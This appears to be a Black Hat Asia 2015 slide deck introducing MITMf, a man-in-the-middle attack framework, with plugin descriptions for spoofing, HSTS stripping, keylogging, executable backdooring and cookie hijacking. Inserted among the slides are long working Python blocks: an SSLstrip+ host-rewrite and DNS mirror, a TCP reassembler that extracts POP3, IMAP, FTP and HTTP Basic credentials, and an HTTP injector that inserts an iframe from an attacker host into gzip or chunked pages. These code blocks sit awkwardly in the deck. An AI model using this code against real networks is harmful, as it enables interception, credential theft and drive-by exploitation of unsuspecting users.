MITMf:
The swiss-army knife
for Man-In-The-Middle Attacks
whoami
@byt3bl33d3r
https://github.com/byt3bl33d3r
http://sign0f4.blogspot.it/
Contributed to the Veil-Framework, Kali-Nethunter and more...
Student
So why do we need another MITM tool?
Stuck in dependency hell
Not really designed to be an attack platform
Good for MITM
Unreliable when modifying traffic
Not easily extendible
Out of date
Too low level
Never got this to work properly
GUI seems broken
Do we even need a GUI?
How did this get started?
I JUST WANT SOMETHING TO RELIABLY INJECT IFRAMES!!!!!
OMG!!
So I Googled like there was no tomorrow until I came across this:
I feel your pain bro...
Sergio wut??
Created by Ben Schmidt (@_supernothing)
http://spareclockcycles.org/
Buy him a drink!
For those wondering, it stands for: Super Effective Recorder of Gathered Inputs and Outputs
A modified version of Moxie Marlinspike's SSLstrip tool
Hooks core functions in SSLstrip to modify traffic
Extremely easy to extend and build upon
So problem solved right?
Well not really...
A lot of the plugins relied on external tools (e.g. Ettercap, Metasploit etc..)
Some plugins were very limited in their functionality and were a bit outdated
Lots of bugs to squash
Weird name but sounds promising!
What I wanted out of it
No reliance on external tools
Verbosity and logging
Minimize dependencies as much as possible (I truly tried..)
BeEF and Metasploit integration via their respective APIs and RPC interfaces
Learn from other projects mistakes!
MITMf v0.9.5
AppCachePoison
JSkeylogger
Inject
Spoof
Filepwn
CacheKill
BeEFAutorun
JavaPwn
Replace
Responder
Upsidedownternet
BrowserProfiler
SMBAuth
SSLstrip+
SessionHijacker
Sniffer
Spoof
Originally used Ettercap
Completely re-written, now uses Scapy
Added support for ICMP redirects, ARP requests, ARP replies and DHCP
Supports DNS tampering (DNS spoofing on steroids)
When DHCP spoofing, can also exploit the ShellShock vuln!
Inject
DEMO!
Replace
Written by @rubenthijssen (Thanks man!)
Replaces strings in HTML content
BrowserProfiler
Injects a JS script to enumerate all browser plugins
Uses PluginDetect to precisely get the installed Java plugin version
http://www.pinlady.net/PluginDetect
JavaPwn
Uses the BrowserProfiler plugin to enumerate the Java Plugin version
Connects to Metasploit using its MSGRPC interface
Uses SpiderLabs' msfrpc library to talk to Metasploit; the original code had a bug, which I fixed. You can find the fixed version here:
https://github.com/byt3bl33d3r/msfrpc
Automatically sets up correct exploits, and injects iframes to trigger them
DEMO!
BeEFAutorun
Born out of frustration with the beef_injection_framework
Automatically injects BeEF hooks
Uses BeEFAPI (https://github.com/byt3bl33d3r/beefapi) to interface with BeEF's RESTful API
Fingerprints OS, Browser and runs modules specified in the config file
FilePwn
Let's pause for a moment to understand how cool this is
Huge shout-out to @midnite_runr
Uses BDFactory to transparently "patch" executables going over HTTP
You can check out BDFactory at:
https://github.com/secretsquirrel/the-backdoor-factory
The plugin uses code from BDFproxy:
https://github.com/secretsquirrel/BDFProxy
JSKeylogger
Injects the JS keylogger found in the http_javascript_keylogger Metasploit module
Modified to work somewhat on mobile devices
Responder
Responder integration into MITMf brings the framework to a whole new level
NBTNS/LLMNR spoofing, acting as a rogue WPAD server and more!
Shout out to Laurent Gaffie for letting me do this!
SSLstrip+
Uses Leonardo Nve's technique for partially bypassing HSTS, as demonstrated last year (BHAsia 2014)
(buy him a drink!)
App Cache Poison
Implements Krzysztof Kotowicz's (@kkotowicz) response tampering attacks
Places web pages in the browser's long-lasting HTML5 AppCache, so the browser keeps serving the modified page even when it is no longer MITM'd
Upsidedownternet
For the lulz
Flips images 180 degrees
Gahhh! Voodoo?? No...
Browser requests http://www.google.com
We return a redirect to http://wwww.google.com
The DNS request gets intercepted and www.google.com is mirrored to wwww.google.com
We then re-write all links to the alternate domain
Client continues in plain-text since the browser has no HSTS setting for wwww.google.com
Hallelujah!
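The host-swap flow above, as an added example written for this page (it is not MITMf's or SSLstrip+'s own code): the redirect, the DNS mirror table and the link rewriting are all driven by one rewrite rule, and an HSTS lookup modelled on the browser's policy store shows why the alternate host escapes the policy and where it does not. The domain names, the HSTS store contents and the rewrite rule for non-www hosts (a "web" prefix) are assumptions.

```python
import re

# Constructed HSTS store, shaped like the one a browser keeps after seeing
# Strict-Transport-Security headers: host -> includeSubDomains flag.
HSTS_STORE = {
    "www.bank.test": False,  # assumed: policy set without includeSubDomains
    "secure.test": True,     # assumed: policy set with includeSubDomains
}


def hsts_applies(host, store=HSTS_STORE):
    """True if a browser holding `store` would force https:// for `host`.

    The exact host always matches; a parent domain only matches when its
    policy carried includeSubDomains.
    """
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in store and (i == 0 or store[candidate]):
            return True
    return False


class HostRewriter:
    """The SSLstrip+ host swap (www.x -> wwww.x) and the table the DNS side
    needs to mirror wwww.x back to www.x."""

    URL_RE = re.compile(r"https://([A-Za-z0-9.-]+)")

    def __init__(self):
        self.mirror = {}  # alternate host -> real host

    def rewrite(self, host):
        # Assumed rule: www.x -> wwww.x; any other host gets a "web" prefix.
        alt = "wwww." + host[4:] if host.startswith("www.") else "web" + host
        self.mirror[alt] = host
        return alt

    def redirect_for(self, host):
        """Step 1: answer the plain http:// request with a redirect to the alternate host."""
        return "http://" + self.rewrite(host) + "/"

    def resolve(self, qname):
        """Step 2: the DNS intercept; an alternate name resolves as the real one."""
        return self.mirror.get(qname, qname)

    def rewrite_html(self, body):
        """Step 3: every https:// link becomes an http:// link on the alternate host."""
        return self.URL_RE.sub(lambda m: "http://" + self.rewrite(m.group(1)), body)


def strip_possible(host, store=HSTS_STORE):
    """The plugin's precondition: the client holds no policy covering the alternate host."""
    return not hsts_applies(HostRewriter().rewrite(host), store)
```

The last function is the caveat behind "partially": a policy with includeSubDomains on a parent domain (or a preloaded one) still covers the alternate host, so the client keeps going over HTTPS and the strip fails for that site.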
Sniffer
A port of Dan McInerney's (@DanHMcInerney) Net-Creds script
https://github.com/DanMcInerney/net-creds
Sniffs passwords, hashes and search engine queries
TCP Re-Assembly aware
Doesn't rely on ports for service identification
Currently supports: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (over all supported protocols such as HTTP, SMB, LDAP etc.) and Kerberos
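An added example, not the Sniffer plugin's or net-creds' own code, of the two properties listed above: a sequence-number based reassembly of one direction of a TCP stream, and credential extraction that identifies the protocol from the bytes (server banner or client command grammar) rather than from the port. The sample segments and banners are constructed; the pair of segments that splits "PASS" across packets shows why per-packet matching misses the password.

```python
import base64
import re

# Constructed sample streams (not real captures): one direction of a TCP
# connection each, as the sniffer would see them after reassembly.
SAMPLE_POP3_SERVER = b"+OK POP3 server ready\r\n"
SAMPLE_POP3_SEGMENTS = [  # client -> server as (seq, payload): out of order, one retransmit
    (1014, b"SS s3cret\r\n"),
    (1000, b"USER alice\r\nPA"),
    (1000, b"USER alice\r\nPA"),
]
SAMPLE_IMAP_SERVER = b"* OK IMAP4rev1 ready\r\n"
SAMPLE_IMAP_CLIENT = b"a001 LOGIN bob hunter2\r\n"
SAMPLE_HTTP_CLIENT = (b"GET /secret HTTP/1.1\r\nHost: intranet.test\r\n"
                      b"Authorization: Basic Y2Fyb2w6cHc=\r\n\r\n")  # base64 of "carol:pw"

USERPASS_RE = re.compile(rb"^(USER|PASS)[ \t]+([^\r\n]+)", re.M | re.I)
IMAP_LOGIN_RE = re.compile(rb'^\S+\s+LOGIN\s+"?([^"\s]+)"?\s+"?([^"\s]+)"?', re.M | re.I)
HTTP_BASIC_RE = re.compile(rb"^Authorization:[ \t]*Basic[ \t]+([A-Za-z0-9+/=]+)", re.M | re.I)


def reassemble(segments, isn):
    """Rebuild one direction of a stream from (seq, payload) pairs that may
    arrive out of order or retransmitted; `isn` is the initial sequence number."""
    stream = bytearray()
    for seq, payload in sorted(segments, key=lambda s: (s[0] - isn) & 0xFFFFFFFF):
        offset = (seq - isn) & 0xFFFFFFFF
        if offset > len(stream):
            break  # a hole: a lost segment, what follows cannot be trusted
        stream += payload[len(stream) - offset:]  # drop bytes already seen (retransmit/overlap)
    return bytes(stream)


def classify(client, server=b""):
    """Identify the protocol from the bytes on the wire, never from the port."""
    banner = server[:8]
    head = client[:24].upper()
    if banner.startswith(b"+OK"):
        return "pop3"
    if banner.startswith(b"* OK"):
        return "imap"
    if banner.startswith(b"220"):  # FTP and SMTP share the greeting; the commands differ
        return "smtp" if head.startswith((b"EHLO", b"HELO")) else "ftp"
    if head.split(b" ", 1)[0] in (b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"OPTIONS"):
        return "http"
    if re.match(rb"^\S+ (LOGIN|CAPABILITY|AUTHENTICATE)\b", head):
        return "imap"
    if head.startswith((b"USER ", b"PASS ")):
        return "ftp-or-pop3"  # same USER/PASS grammar; the server banner would settle it
    return "unknown"


def extract_creds(client, server=b""):
    """Return (protocol, user, password) triples found in a client stream."""
    proto = classify(client, server)
    found = []
    if proto in ("ftp", "pop3", "ftp-or-pop3"):
        user = None
        for cmd, arg in USERPASS_RE.findall(client):
            if cmd.upper() == b"USER":
                user = arg
            elif user is not None:  # a PASS that follows a USER completes a pair
                found.append((proto, user.decode("latin-1"), arg.decode("latin-1")))
                user = None
    elif proto == "imap":
        for user, pw in IMAP_LOGIN_RE.findall(client):
            found.append((proto, user.decode("latin-1"), pw.decode("latin-1")))
    elif proto == "http":
        for token in HTTP_BASIC_RE.findall(client):
            try:
                user, _, pw = base64.b64decode(token).partition(b":")
            except ValueError:
                continue
            found.append((proto, user.decode("latin-1"), pw.decode("latin-1")))
    return found
```

Run `extract_creds(reassemble(SAMPLE_POP3_SEGMENTS, 1000), SAMPLE_POP3_SERVER)` to get the POP3 pair; running `extract_creds` on the lone `b"SS s3cret\r\n"` segment returns nothing, which is the per-packet failure mode reassembly exists to avoid.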
But Dude! I want some shells ! <3
I got you covered!
Injects anything you want into HTML!
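An added example of the response-side injection the Inject plugin performs (this is not MITMf's code): it deals with the two things that make naive injectors unreliable when modifying traffic, a chunked transfer and a gzip-compressed body, then inserts the payload before </body>, fixes Content-Length and drops the encoding headers it invalidated. The request-side helper strips Accept-Encoding so the server answers uncompressed in the first place. The iframe host and the sample responses are constructed.

```python
import gzip
import re

PAYLOAD = b'<iframe src="http://attacker.test/" width="0" height="0"></iframe>'  # assumed host

# Constructed sample traffic: a gzip'd, chunked HTML response and a non-HTML one.
_ORIGINAL_BODY = b"<html><body><h1>Hello</h1></body></html>"
_GZ = gzip.compress(_ORIGINAL_BODY)
SAMPLE_HTML_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                        b"Content-Encoding: gzip\r\nTransfer-Encoding: chunked\r\n\r\n"
                        + ("%x" % len(_GZ)).encode() + b"\r\n" + _GZ + b"\r\n0\r\n\r\n")
SAMPLE_IMAGE_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\nContent-Length: 4\r\n\r\nPNG!"


def parse_response(raw):
    """Split a raw HTTP response into status line, [(name, value)] headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def header(headers, name):
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def dechunk(body):
    """Undo chunked transfer encoding (chunk extensions and trailers are ignored)."""
    out = bytearray()
    while True:
        size_line, _, body = body.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            break
        out += body[:size]
        body = body[size + 2:]  # skip the chunk data and its trailing CRLF
    return bytes(out)


def inject(raw_response, payload=PAYLOAD):
    """Insert `payload` before </body> of an HTML response; leave anything else untouched."""
    status, headers, body = parse_response(raw_response)
    ctype = header(headers, b"Content-Type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return raw_response
    if (header(headers, b"Transfer-Encoding") or b"").lower() == b"chunked":
        body = dechunk(body)
    if (header(headers, b"Content-Encoding") or b"").lower() == b"gzip":
        body = gzip.decompress(body)
    m = re.search(rb"</body>", body, re.I)
    pos = m.start() if m else len(body)
    body = body[:pos] + payload + body[pos:]
    # The body is now plain and of a new size: drop the headers that no longer hold.
    stale = (b"content-length", b"content-encoding", b"transfer-encoding")
    headers = [(n, v) for n, v in headers if n.lower() not in stale]
    headers.append((b"Content-Length", str(len(body)).encode()))
    head = b"\r\n".join([status] + [n + b": " + v for n, v in headers])
    return head + b"\r\n\r\n" + body


def strip_accept_encoding(raw_request):
    """Request side: remove Accept-Encoding so the server does not compress the reply."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    lines = [l for l in head.split(b"\r\n") if not l.lower().startswith(b"accept-encoding:")]
    return b"\r\n".join(lines) + sep + body
```

Without the Content-Length fix the browser either truncates the page (payload lost) or hangs waiting for bytes that never come, which is the "inject works one time in three" symptom; without the encoding handling the iframe is written into the middle of a gzip stream and the page simply fails to render.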
Looking into the crystal ball...
Evilgrade and Snarf integration
Actual SSL/TLS support
SSLsplit like functionality
MITM RDP connections (almost done)
More protocol level attacks (Yersinia)
More HSTS bypasses
Session Hijacker
Automatically stores captured cookies in a Firefox profile, uses code from Firelamb:
https://github.com/sensepost/mana/tree/master/firelamb
Alternatively can send the cookies to the "Mallory cookie injector" browser extension
SMBAuth
Injects iframes with UNC paths to trigger SMB challenge-response attempts
MITMf BHASIA 2015